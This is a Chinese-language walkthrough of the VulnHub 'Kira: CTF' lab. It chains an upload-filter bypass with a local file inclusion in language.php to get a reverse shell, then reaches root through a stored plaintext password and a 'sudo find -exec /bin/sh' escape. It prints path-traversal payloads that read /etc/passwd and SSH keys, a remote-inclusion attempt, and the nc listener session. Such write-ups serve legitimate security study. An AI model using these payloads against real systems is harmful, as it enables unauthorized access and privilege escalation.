KiraCTF
作者: jason_huawen
靶机基本信息
名称:Kira: CTF
地址:
https://www.vulnhub.com/entry/kira-ctf,594/
识别目标主机IP地址
──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.26.75.0/16 | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 3 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:f8:97:75 2 120 PCS Systemtechnik GmbH
192.168.56.223 08:00:27:a6:c7:86 2 120 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.223
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.223 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-26 05:55 EST
Nmap scan report for localhost (192.168.56.223)
Host is up (0.000073s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:A6:C7:86 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds
NMAP扫描结果表明目标主机有1个开放端口80(HTTP)
Get Access
访问80端口,发现是个文件上传的页面,用图片测试上传功能,可以正常上传,而且文件上传位置在/uploads目录
然后直接上传shell.php,返回错误信息:File is not image
尝试第一种绕过:用burpsuite截获请求,修改Content-type为image/jpeg,返回同样的错误信息。
尝试第二种绕过:在shell.php头部添加GIF89a; 返回同样的错误信息
另外首页页面含有language链接,访问该链接,似乎有本地文件包含漏洞,确认一下:
┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ curl http://192.168.56.223/language.php?lang=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
bassam:x:1000:1000:Bassam,,,:/home/bassam:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
<!DOCTYPE html>
<html>
<head>
<title>LFI</title>
</head>
<body>
<input type="submit" value="language"
onclick="window.location='/language.php?lang=en.php';" />
</form>
</body>
</html>
目标主机确实存在本地文件包含漏洞,那看一下是否有私钥可以先下载到本地
┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ curl http://192.168.56.223/language.php?lang=../../../../../../../home/bassam/.ssh/id_rsa
<!DOCTYPE html>
<html>
<head>
<title>LFI</title>
</head>
<body>
<input type="submit" value="language"
onclick="window.location='/language.php?lang=en.php';" />
</form>
</body>
</html>
既然存在LFI,那看下是否存在远程文件包含漏洞,以便获得shell
┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ curl http://192.168.56.223/language.php?lang=http://192.168.56.206:8000/test.txt
<!DOCTYPE html>
<html>
<head>
<title>LFI</title>
</head>
<body>
<input type="submit" value="language"
onclick="window.location='/language.php?lang=en.php';" />
</form>
</body>
</html>
经过测试,不能实现远程文件包含。
看了一下其他人的解决方法是,需要结合两种漏洞,即文件上传以及本地文件包含漏洞
将shell.php改名称为shell2.php.jpeg,然后用本地文件包含漏洞去读取这个文件
从而拿到shell
http://192.168.56.223/language.php?lang=../../../../../../../var/www/html/uploads/shell2.php.jpeg
┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.223] 45524
Linux bassam-aziz 5.3.0-28-generic #30~18.04.1-Ubuntu SMP Fri Jan 17 06:14:09 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
14:55:20 up 1:07, 1 user, load average: 0.06, 0.05, 0.35
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bassam :0 :0 13:47 ?xdm? 23.94s 0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu gnome-session --session=ubuntu
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@bassam-aziz:/$ ls
ls
bin dev initrd.img lib64 mnt root snap sys var
boot etc initrd.img.old lost+found opt run srv tmp vmlinuz
cdrom home lib media proc sbin swapfile usr
www-data@bassam-aziz:/$ cd /home
cd /home
www-data@bassam-aziz:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K ما� 26 2020 .
drwxr-xr-x 24 root root 4.0K ما� 26 2020 ..
drwxr-xr-x 16 bassam bassam 4.0K نو� 26 13:48 bassam
www-data@bassam-aziz:/home$ cd bassam
cd bassam
www-data@bassam-aziz:/home/bassam$ ls -alh
ls -alh
total 116K
drwxr-xr-x 16 bassam bassam 4.0K نو� 26 13:48 .
drwxr-xr-x 3 root root 4.0K ما� 26 2020 ..
-rw------- 1 bassam bassam 1.7K نو� 26 13:47 .ICEauthority
-rw------- 1 bassam bassam 0 نو� 4 2020 .bash_history
-rw-r--r-- 1 bassam bassam 220 ما� 26 2020 .bash_logout
-rw-r--r-- 1 bassam bassam 3.7K ما� 26 2020 .bashrc
drwx------ 13 bassam bassam 4.0K ما� 26 2020 .cache
drwx------ 11 bassam bassam 4.0K ما� 26 2020 .config
drwx------ 3 bassam bassam 4.0K ما� 26 2020 .gnupg
drwx------ 3 bassam bassam 4.0K ما� 26 2020 .local
drwx------ 5 bassam bassam 4.0K ما� 26 2020 .mozilla
-rw-r--r-- 1 bassam bassam 807 ما� 26 2020 .profile
-rw-r--r-- 1 root root 66 ما� 26 2020 .selected_editor
drwx------ 2 bassam bassam 4.0K ما� 26 2020 .ssh
-rw-r--r-- 1 bassam bassam 0 ما� 26 2020 .sudo_as_admin_successful
-rw-r----- 1 bassam bassam 5 نو� 26 13:47 .vboxclient-clipboard.pid
-rw-r----- 1 bassam bassam 5 نو� 26 13:47 .vboxclient-display.pid
-rw-r----- 1 bassam bassam 5 نو� 26 13:47 .vboxclient-draganddrop.pid
-rw-r----- 1 bassam bassam 5 نو� 26 13:47 .vboxclient-seamless.pid
drwxr-xr-x 2 bassam bassam 4.0K ما� 26 2020 Desktop
drwxr-xr-x 2 bassam bassam 4.0K ما� 26 2020 Documents
drwxr-xr-x 2 bassam bassam 4.0K ما� 26 2020 Downloads
drwxr-xr-x 2 bassam bassam 4.0K ما� 26 2020 Music
drwxr-xr-x 2 bassam bassam 4.0K ما� 26 2020 Pictures
drwxr-xr-x 2 bassam bassam 4.0K ما� 26 2020 Public
drwxr-xr-x 2 bassam bassam 4.0K ما� 26 2020 Templates
drwxr-xr-x 2 bassam bassam 4.0K ما� 26 2020 Videos
-rw-r--r-- 1 bassam bassam 8.8K ما� 26 2020 examples.desktop
-rw------- 1 bassam bassam 32 نو� 4 2020 user.txt
www-data@bassam-aziz:/home/bassam$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@bassam-aziz:/home/bassam$
提权
www-data@bassam-aziz:/var/www$ cd html
cd html
www-data@bassam-aziz:/var/www/html$ ls -alh
ls -alh
total 28K
drwxr-xr-x 4 root root 4.0K ما� 26 2020 .
drwxr-xr-x 3 root root 4.0K ما� 26 2020 ..
-rw-r--r-- 1 root root 163 ما� 26 2020 index.html
-rw-r--r-- 1 root root 287 ما� 26 2020 language.php
drwxr-xr-x 2 root root 4.0K نو� 4 2020 supersecret-for-aziz
-rw-r--r-- 1 root root 747 ما� 26 2020 upload.php
drwxrwxrwx 2 root root 4.0K نو� 26 14:48 uploads
www-data@bassam-aziz:/var/www/html$ cd supersecret-for-aziz
cd supersecret-for-aziz
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ ls -alh
ls -alh
total 12K
drwxr-xr-x 2 root root 4.0K نو� 4 2020 .
drwxr-xr-x 4 root root 4.0K ما� 26 2020 ..
-rw-r--r-- 1 root root 15 نو� 4 2020 bassam-pass.txt
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ cat bassam-pass.txt
cat bassam-pass.txt
Password123!@#
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ su - bassam
su - bassam
Password: Password123!@#
bassam@bassam-aziz:~$ id
id
uid=1000(bassam) gid=1000(bassam) groups=1000(bassam),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
bassam@bassam-aziz:~$ sudo -l
sudo -l
[sudo] password for bassam: Password123!@#
Matching Defaults entries for bassam on bassam-aziz:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bassam may run the following commands on bassam-aziz:
(ALL : ALL) /usr/bin/find
bassam@bassam-aziz:~$ sudo -u root /usr/bin/find . -exec /bin/sh \; -quit
sudo -u root /usr/bin/find . -exec /bin/sh \; -quit
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls -alh
ls -alh
total 36K
drwx------ 4 root root 4.0K نوفمب 4 2020 .
drwxr-xr-x 24 root root 4.0K مارس 26 2020 ..
-rw-r--r-- 1 root root 3.1K أبريل 9 2018 .bashrc
drwx------ 2 root root 4.0K فبراي 3 2020 .cache
-rw-r--r-- 1 root root 43 نوفمب 4 2020 flag.txt
-rw-r--r-- 1 root root 1.0K نوفمب 4 2020 .fl.swp
drwxr-xr-x 3 root root 4.0K مارس 26 2020 .local
-rw-r--r-- 1 root root 148 أغسطس 17 2015 .profile
-rw-r----- 1 root root 5 نوفمب 26 13:47 .vboxclient-display-svga.pid
# cat flag.txt
cat flag.txt
THM{root-Is_Better-Than_All-of-THEM-31337}
#
提权成功!
经验教训
-
其实这里的文件上传很好绕过,只需要加上扩展名.jpeg即可,但是如果直接访问该文件,会认为是图片,有错误的图片,而不能拿到shell
-
结合本地文件包含漏洞,读取图片文件(其实就是shell.php),从而拿到shell